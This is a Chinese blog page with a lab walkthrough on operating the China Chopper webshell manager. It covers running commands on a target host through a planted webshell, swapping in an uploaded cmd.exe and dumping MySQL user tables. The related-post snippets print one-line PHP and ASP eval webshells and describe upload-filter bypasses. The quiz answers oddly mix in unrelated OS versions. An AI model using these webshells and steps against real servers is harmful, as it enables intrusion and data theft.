菜刀如何连接mysql_中国菜刀之终端操作及数据库管理

最新推荐文章于 2024-11-01 15:21:01 发布
原创 最新推荐文章于 2024-11-01 15:21:01 发布 · 3.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#菜刀如何连接mysql

本文介绍了如何使用中国菜刀工具进行网站管理、数据库管理和虚拟终端操作。通过设置自定义终端路径、配置数据库参数,以及执行SQL语句,展示了菜刀在连接MySQL数据库和执行系统命令方面的功能。实验环境中,通过虚拟终端执行cmd命令,并演示了读取数据库信息的方法。

实验环境操作机:Windows XP

目标地址:172.16.12.2

实验目的认识中国菜刀工具

熟练使用中国菜刀工具进行网站文件管理、数据库管理、使用虚拟终端等操作。

实验内容

内容预览尝试执行命令

自定义终端路径

配置数据库相关参数

读取数据库信息和执行sql语句

虚拟终端操作中国菜刀的虚拟终端功能其实是通过相应的脚本函数执行系统命令并取得返回信息。

小i提示:在本次实验中,请注意实验工具、实验文件存放路径,不同的文件路径可能会出现不一样的实验结果。

在实验环境中无法连接互联网,请使用您本地的网络环境。

在本次实验中,访问目标网址172.16.12.2进行实验

实验步骤

步骤1:尝试执行命令

注意:以下菜刀功能全部建立在已经添加可用的webshell的情况下(webshell:http://172.16.12.2/hack.php密码:pass).在中国菜刀界面首页右击该目标,选择虚拟终端:

b53171de63fd0791e8a1eb2f81be752f.png

进入命令行界面后,如果没有特殊的权限设置,可以直接在这里执行系统命令。

我们进入虚拟终端功能,尝试执行一条cmd命令set(查看系统环境变量),可得到回显,说明虚拟终端功能可用。如图:

80062843b6c7d4a467ac7942d0ed9664.gif

步骤2:自定义终端路径某些时候c:windowssystem32cmd.exe拒绝访问,需要更换cmd路径来突破

我们先上传一个自己的cmd.exe (cmd.exe(本地路径C:WINDOWSsystem32),最好与目标机系统位数匹配,我们上传在www目录,于是此时cmd的物理路径为c:wwwcmd.exe:

74ca89d366ac693f84ac26c11e77cb69.gif

终端执行以下命令切换脚本调用的cmd.exe路径到c:wwwcmd.exe:1setp:c:wwwcmd.exe

d4cd3c3f08d27dd94d273f4a24537183.gif

一般情况下,此方法避免了执行命令时出现的拒绝访问错误:tips:在此执行的系统命令并非交互式,如需获得交互式的shell,请参考相关资料使用nc。

步骤3:配置数据库相关参数菜刀连接数据库即是依赖于已存在的脚本,调用相关函数对相应的数据库进行连接和管理。

先来看一段菜刀里的数据库配置代码,以mysql为例1

2

3

4

5MYSQL //这里填写数据库类型

localhost //这里填写数据库主机地址

root //这里填写数据库用户名

root

//这里填写数据库密码

utf8 //这里填写编码方式在中国菜刀界面首页右击该目标,选择数据库管理,然后如下图操作:

7a1c81d3ab7b825a940d82c2c2a5c21b.gif

步骤4:读取数据库信息和sql语句执行菜刀提供了比较直观的数据库浏览功能,对需要浏览的相关数据库结构,如表、列、字段等直接双击即可。

9c39ef3274b1572a78a2f00691500cdf.gif

读取字段内容时菜刀自动构造了sql语句,点击语句栏后面的执行即可读取。执行sql语句:直接在数据库管理界面的语句栏输入自定义的sql语句,点击后面的执行即可。

例如,执行如下sql语句(查询数据库用户相关信息):1select * from mysql.user;

如下图操作:

05495af3c7842b08515bdd201715bfb2.gif

第1题:尝试获得Host为localhost、User为root的数据库用户的password字段值

root

第2题:尝试执行cmd命令ver,取得目标机系统版本。

Microsoft Windows XP [版本 5.1.2600]

Darwin kernel version 16.5.0

Microsoft Windows [版本 10.0.15063]

季九
关注
WebShell连接工具(中国菜、WeBaCoo、Weevely)使用
悦分享
07-31 4154
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理数据库管理虚拟终端。哈哈...大功告成!...
中国菜原理与实践
悦分享
08-03 1859
中国菜(Chopper)是一款经典的网站管理工具,具有文件管理数据库管理虚拟终端等功能。服务端其中‍Sp4ar是连接密码,可以随意更改。也可对服务端做一些混淆操作。配置类型 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种主机地址 主机地址可为机器名或IP地址,如localhost数据库用户 连接数据库的用户名,如root数据库密码 连接数据库的密码,如123456。...
mysql中国菜连接_中国菜使用方法以及小技巧
weixin_34938347的博客
02-08 2100
相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接数据库。服务端:在服务端运行的代...
菜刀连接mysql数据库_jdbc操作数据库
weixin_33837846的博客
01-21 501
Jdbc链接数据库步骤:1、 加载数据库驱动MySql驱动Class.forName(“com.mysql.jdbc.Driver”);SqlServer驱动Class.forName(“com.microsoft.jdbc.sqlserver.SqlServerDriver”);Oracle驱动Class.forName("oracle.jdbc.driver.OracleDriver")...
中国菜数据库管理
最新发布
2402_83137853的博客
11-01 345
右键我们添加的链接选择数据库管理,进入页面之后点击数据库配置,输入数据库类型这里以MYSQL为例,然后输入主机名可以使用localhost也可以使用ip,然后设置用户名、密码、字符编码之后点击提交就可以得到目标系统的数据库管理页面。中国菜是一款功能强大的webshell工具,可以用来对目标网站进行渗透获取目标系统的文件系统,对目标系统的文件系统进行管理同时也可以对获取系统的shell进行操作命令执行操作,同时可以对目标系统进行数据库操作
10-菜刀连接木马
tianxiadiiw的博客
04-16 1054
可以获取你想要的配置信息,也可以用system函数来输入命令。是属于辅助工具,并且菜刀的传输过程是明文传输的,目前已经被WAF进行防护了。接下来就可以连接菜刀,使用菜刀连接木马然后就可以查看到服务器里面的东西了。先看是否存在注入点,有下图所示则表示存在注入点==》可以进行接下来的操作。2、木马必须是POST请求,参数自定义,在菜刀里给出正确的参数名。写入一句话的木马进行探测,如果嗅探成功后在进行大马的上传。找到了漏洞后,并且上传了木马之后才能使用的两款工具。有文件,则说明可以读任意路径的文件。
mysql弱密码爆破及利用方法
m0_75198157的博客
04-08 767
linux kali2021中已经安装了mysql,所以可以在终端中使用mysql命令登录。在windows中,如果安装了mysql,在mysql/bin/mysql.exe。3、利用我们爆破出的用户名和密码,使用mysql客户端登录远程mysql服务器。执行成功后,可以用 菜刀连接,打开flagvalue.txt文件。可以看到:默认端口3306 默认用户名:root。需要在mysql服务器上开启写入文件的权限。这个变量默认的值是空值,表示不允许写入。修改目录的权限为完全的权限。
中国菜使用介绍
m0_37786014的博客
12-04 1873
一、简介 服务器只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。 目前支持的服务端脚本:PHP、ASP、.NET,并且支持、https安全连接的网站 在服务器端运行的代码如下: PHP:<?php @eval($_POST['pass'];?)> ASP:<%eval request("pass")%> ASP.NET:...
一句话木马拿Shell与菜刀原理
悦分享
07-12 2071
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
中国菜 数据管理
xhlylxhl的博客
08-28 1067
依据Gartner的预估,全世界非关系数据库(NoSQL)在2020~2022预估维持在30%上下髙速提高,远超数据库查询总体销售市场。 伴随NoSQL和云计算技术的盛行和发展趋势,在阿里服务器上立即对外开放出示服务项目也是1年多時间,并在上年的12月全新升级公布X-Pack,将单一化的HBase演进到1个详细的数据处理方法服务平台的工作能力。人们留意到也有许多同学们和顾客不清晰HBaseX-P...
菜刀虚拟终端原理
qq_40334963的博客
04-08 1669
菜刀虚拟终端系统命令执行原理分析。 菜刀传输恶意代码的方式:通过调用array_map函数,对敏感字符串做字符串拼接和大小写混合,对核心代码做base64加密。 代码执行步骤: 1.关闭脚本信息报错 2.获取当前文件绝对路径 3.字符串拼接系统命令 4.调用proc_open函数执行拼接的系统命令 5.输出结果 6.结束脚本
中国菜的使用
xy_wjyjw的博客
10-27 474
中国菜实现与一句话木马联动:中国菜在本地(攻击机)。一句话木马在服务器(靶机)上。WebShell Manager管理工具。
菜刀的模拟终端使用miikatz
a007zdshuai的博客
04-11 634
为啥子我抓到的password.txt大小为0KB, 实在是想不通, 特意搞了个对比图, 左边是别人之前搞的,右边是我刚刚搞的。 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语...
中国菜使用(实战正确姿势)
热门推荐
weixin_49071539的博客
12-17 1万+
图片上传漏洞: ps:此教程为靶场实战,切勿用于非法用途 1. 准备制作图片马,随便找到一张图片重命名为1.jpg 2. 准备好一句话木马,这里我命名为1.php 3. 需要用到dos命令将两个文件合到一起,windows+R 输入cmd回车。找到存放文件的路径,输入命令:copy 1.jpg/b + 1.php/a 2.jpg文件夹中会自动生成一个2.jpg文件。 4. 选择上传2.jpg 5.上传,使用bp抓包更改后缀,将filename后面的.jpg改为.php,转发。 6. 可以看到上传
sqli-labs (less7-less8) & 菜刀用法
Xi4or0uji
07-25 1111
less 7 outfile&amp;菜刀用法 这关没什么好说的,主要讲讲菜刀用法 首先还是先讲一下这关好吧 ?id=1'会报错,?id=1"则说you are in...use outfile.... 后台语句是$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; 所以用?id=1'))--+是可以闭合的,重点不是这里,题目...
中国菜的简单使用
abtgu的博客
04-08 4333
简介 说到菜刀,普通人肯定想到家里切菜的菜刀,而对于程序员来说,首先想到的却是一款功能强大的webshell管理工具。中国菜小巧实用,具有文件管理数据库管理虚拟终端等功能,支持PHP,ASP的服务端脚本。 简单使用 新建一个PHP文件,写入一句话<?php eval($_POST['a']);?>将这个文件上传到站点里。 打开菜刀,在空白处右键点击“添加”,按照图中指示进行填写...
maicaidao
0ffs3t
10-27 1695
这篇文章是一个朋友写的,但是他不让说他是谁,就替他保密一下了。这篇文章看起来很像软文,但是文章中介绍的还挺详细,不要把他当成软文来读就行了。 作者:XXX 我是一个玩黑很多年的人,入侵了大大小小的服务器无数,体验着入侵快感的同时,自己的技术和经验也不断提高,在渗透过程中收集了大大小小的工具一堆,都快把自己的U盘放满了,当然,随着时代和技术的进步,很多工具也相应的过时了,但是却很少去删掉
中国菜的作用详细介绍和使用说明(黑站神器与侧门运用检测工具)
xhlylxhl的博客
08-29 2331
中国菜,1个很好用而又强劲的webshell,它并不是用于切黄瓜的煮饭的道具哦,是这款技术专业的网址管理系统软件,尺寸只能300多KB,简直精巧好用啊!只有被犯罪分子运用到,就是说1个黑站的神器了。我还记得之前触碰的那时候探求了好长时间才用到,嘿嘿。。之后理解以后才发觉并不会太难实际操作,一起作用也比我想像的要强劲。 配置图: 注:独立的菜刀沒有实际效果,必须服务端有一段话侧...
网络安全实验十三 渗透测试项目
qq_64314976的博客
06-23 2682
步骤:在虚拟终端输入创建一个名叫hacker密码为111111的用户,但直接添加到管理组提升不了权限,远程桌面过去,输入账号hacker密码111111即可登录,登陆后发现没有administrators这个组,用whoami /all查看获取本地系统上所有用户(访问令牌)的用户名和组信息,注意到第一个的类型是别名(另外两个是已知),改名将hacker添加到管理组,成功执行,可以看到组成员多了一项。3、获得服务器上的关键敏感数据(C:\console)内。(网页关入侵--铜牌任务)(入侵提权--银牌任务)
MacCMS8.0漏洞利用工具:一句话木马与菜刀连接
该工具的描述提到,它可以用于获取服务器的shell权限,操作者只需通过简单的一句话木马命令传递,结合常用的后门控制工具'菜刀'进行连接即可实现控制。工具的标签中包含了'horsen9f'、'getshell'、'MacCMSgetshell'...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值